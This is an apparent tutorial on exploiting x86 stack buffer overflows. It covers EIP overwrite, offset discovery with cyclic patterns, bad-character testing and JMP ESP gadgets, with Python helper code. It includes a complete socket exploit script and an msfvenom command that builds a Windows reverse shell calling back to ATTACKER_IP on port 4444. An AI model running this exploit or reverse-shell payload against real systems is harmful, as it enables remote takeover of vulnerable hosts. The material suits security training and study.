How the Stack Works
A stack-based buffer overflow works because of how C programs manage memory at runtime. When a function is called, the return address (where execution should go after the function finishes) gets pushed onto the stack alongside the local variables. If a local variable — say, a character buffer — is written to without checking how much data goes in, an attacker can write enough bytes to overflow past the buffer and overwrite the return address. When the function returns, it jumps to the attacker-controlled address instead of the legitimate one.
EIP is the instruction pointer register on x86. It holds the address of the next instruction to execute. On x86, when a function returns, EIP gets loaded from the stack. Controlling what's at that stack location means controlling where execution goes.
Stack Layout (Simplified)
[ Buffer ] → [ Saved EBP ] → [ Return Address (EIP) ] → [ ... ]
Writing past the end of the buffer overwrites the saved EBP first, then the saved return address that gets loaded into EIP. Control that value and you control execution.
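The overwrite order can be illustrated without touching real memory. What follows is a toy Python model of the layout above, not actual process memory: the 16-byte buffer size, the two slot values, and the helper names (`make_frame`, `unchecked_copy`, `read_slots`) are all made up for illustration.

```python
import struct

BUF_SIZE = 16  # hypothetical buffer size for this toy model


def make_frame():
    """Return a fake frame laid out low to high: buffer, saved EBP, return address."""
    frame = bytearray(BUF_SIZE)
    frame += struct.pack("<I", 0xBFFFF0A8)  # made-up saved EBP
    frame += struct.pack("<I", 0x08048456)  # made-up legitimate return address
    return frame


def unchecked_copy(frame, data):
    """Copy data into the frame starting at the buffer, with no length check."""
    frame[0:len(data)] = data
    return frame


def read_slots(frame):
    """Decode the saved EBP and return address slots that follow the buffer."""
    return struct.unpack_from("<II", frame, BUF_SIZE)


# 16 bytes fill the buffer, the next 4 land on saved EBP, the next 4 on the return address.
frame = unchecked_copy(make_frame(), b"A" * BUF_SIZE + b"B" * 4 + b"C" * 4)
saved_ebp, ret_addr = read_slots(frame)
print(hex(saved_ebp), hex(ret_addr))  # 0x42424242 0x43434343
```

An input of exactly `BUF_SIZE` bytes leaves both slots untouched in this model; every byte beyond that spills into the next slot in order.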
The Exploitation Methodology
The process follows predictable steps. First, crash the application with a large input to confirm that a vulnerability exists. Then use a cyclic pattern to identify exactly how many bytes it takes to reach EIP: the offset. Then verify EIP control by placing a recognisable value at that offset. Then identify bad characters that would break your shellcode (null bytes, newlines, carriage returns, and whatever else the application treats as terminators). Then find a JMP ESP instruction in a module loaded without ASLR, at an address that itself contains no bad characters; DEP must also be off for the process, since the shellcode runs from the stack. Then generate shellcode that excludes your bad characters. Finally, build the full payload.
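The offset step is easier to follow with the pattern logic written out. This is a minimal sketch of a cyclic pattern built from upper/lower/digit triples, assuming a 32-bit little-endian target; the function names `pattern_create` and `pattern_offset` are chosen here for illustration, and in practice you would normally use the pattern tools that ship with your framework or debugger plugin.

```python
import string
import struct


def pattern_create(length):
    """Build a cyclic pattern of upper/lower/digit triples: Aa0Aa1Aa2..."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("length exceeds the 20280 bytes this pattern provides")


def pattern_offset(eip_value, length):
    """Return the pattern offset of the 4 bytes seen in EIP, or -1 if absent."""
    needle = struct.pack("<I", eip_value)  # EIP displays the bytes in reverse order
    return pattern_create(length).find(needle)


# Simulate a crash where the 4 pattern bytes at offset 1978 ended up in EIP.
pattern = pattern_create(3000)
eip_at_crash = struct.unpack("<I", pattern[1978:1982])[0]
print(pattern_offset(eip_at_crash, 3000))  # 1978
```

Because each 4-byte window in the pattern is distinct, the value the debugger shows in EIP maps back to a single position, and that position is the filler length.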
import socket

ip = "TARGET_IP"                   # placeholder: address of the lab target
port = 9999

offset = 1978                      # filler bytes before the saved return address
retn = b"\xaf\x11\x50\x62"         # JMP ESP address 0x625011af, little-endian
padding = b"\x90" * 16             # NOP sled
shellcode = b""                    # msfvenom output goes here

payload = b"A" * offset + retn + padding + shellcode

with socket.socket() as s:
    s.connect((ip, port))
    s.sendall(payload)             # sendall keeps writing until every byte is sent
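Reversing the address bytes by hand is an easy place to slip. As a hedged alternative, `struct.pack` can do the little-endian conversion for you. The helper name `build_payload` is hypothetical, and the shellcode stays an empty placeholder here.

```python
import struct


def build_payload(offset, ret_addr, nop_len, shellcode):
    """Lay out filler, return address, NOP sled, and shellcode in that order."""
    filler = b"A" * offset               # bytes up to the saved return address
    retn = struct.pack("<I", ret_addr)   # 32-bit address, little-endian
    sled = b"\x90" * nop_len             # NOP landing area
    return filler + retn + sled + shellcode


payload = build_payload(1978, 0x625011AF, 16, b"")
print(payload[1978:1982])  # b'\xaf\x11Pb', the same bytes as b"\xaf\x11\x50\x62"
print(len(payload))        # 1998
```

Passing the address as an integer means it can be copied straight from the debugger without reordering.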
Bad Characters and JMP ESP
Bad characters are bytes that the application interprets specially and either strips, modifies, or terminates input on. A null byte (0x00) terminates C strings. A newline (0x0a) or carriage return (0x0d) might terminate a network protocol read. You find them by sending a byte array from 0x01 to 0xff after your offset, then examining memory in the debugger. Any byte that causes the sequence to break or change is a bad character. Remove it, resend, and repeat until the full array lands intact.
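The send-and-compare loop can be sketched in a few lines. This assumes you have copied the bytes that landed in memory out of the debugger into a `bytes` object; the helper names `make_test_bytes` and `first_mismatch` are made up for this example.

```python
def make_test_bytes(exclude=b"\x00"):
    """All byte values in ascending order, minus those already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent, observed):
    """Return (index, sent_byte, observed_byte) at the first difference, else None."""
    for i, expected in enumerate(sent):
        actual = observed[i] if i < len(observed) else None
        if actual != expected:
            return i, expected, actual
    return None


sent = make_test_bytes()
# Simulate an application that stops reading at the first newline (0x0a).
observed = sent[:sent.index(0x0A)]
print(first_mismatch(sent, observed))  # (9, 10, None)
```

Each time a mismatch shows up, add the offending byte to `exclude`, regenerate the array, and resend. Checking only the first mismatch matters because one bad byte can corrupt or truncate everything after it.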
The JMP ESP instruction is the classic return address target. After a function returns with your controlled EIP, ESP points to the data immediately after EIP in your payload — which is where your shellcode sits. If you redirect EIP to the address of a JMP ESP instruction in any loaded module, execution jumps to your shellcode. The key is finding a module without ASLR enabled so the address is predictable.
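On x86, JMP ESP encodes as the two bytes FF E4, so locating one comes down to a byte search over a module's mapped memory. Debugger plugins normally do this for you; the sketch below only shows the idea, and the sample bytes, base address, and function name `find_jmp_esp` are invented for illustration.

```python
JMP_ESP = b"\xff\xe4"  # x86 machine code for JMP ESP


def find_jmp_esp(image, base_addr):
    """Yield the virtual address of every FF E4 byte pair in a mapped image."""
    pos = image.find(JMP_ESP)
    while pos != -1:
        yield base_addr + pos
        pos = image.find(JMP_ESP, pos + 1)


# Made-up bytes standing in for a module mapped at a made-up base address.
sample_image = b"\x90\x90\xff\xe4\xc3\xff\xe4"
for addr in find_jmp_esp(sample_image, 0x62500000):
    print(hex(addr))  # 0x62500002, then 0x62500005
```

The search assumes `image` holds the bytes as they sit in memory. Offsets in the file on disk generally differ from virtual addresses, so a raw file search would need section mapping on top of this.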
Shellcode Generation
msfvenom -p windows/shell_reverse_tcp \
  LHOST=ATTACKER_IP LPORT=4444 \
  EXITFUNC=thread \
  -b "\x00\x0a\x0d" \
  -f python
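The -b flag tells msfvenom to encode the payload so that none of your bad characters appear in the output. EXITFUNC=thread makes the shellcode terminate only its own thread when it finishes, so the target process keeps running instead of crashing. The NOP sled before your shellcode gives the encoder's decoder stub room to unpack the payload in place and absorbs minor ESP alignment differences between runs.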
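It can be worth confirming that nothing in the final payload contains a bad character, including the packed return address, since it travels through the same input path. A minimal sketch follows; the helper name `bad_bytes_in` is hypothetical, and the default bad-character set is just the one used in the command above.

```python
def bad_bytes_in(blob, bad=b"\x00\x0a\x0d"):
    """Return (offset, byte) pairs for every forbidden byte found in blob."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]


print(bad_bytes_in(b"\xaf\x11\x50\x62"))  # [] : this return address is clean
print(bad_bytes_in(b"\x90\x0a\x41\x00"))  # [(1, 10), (3, 0)]
```

An empty list means the bytes should survive the application's input handling, at least for the bad characters identified so far.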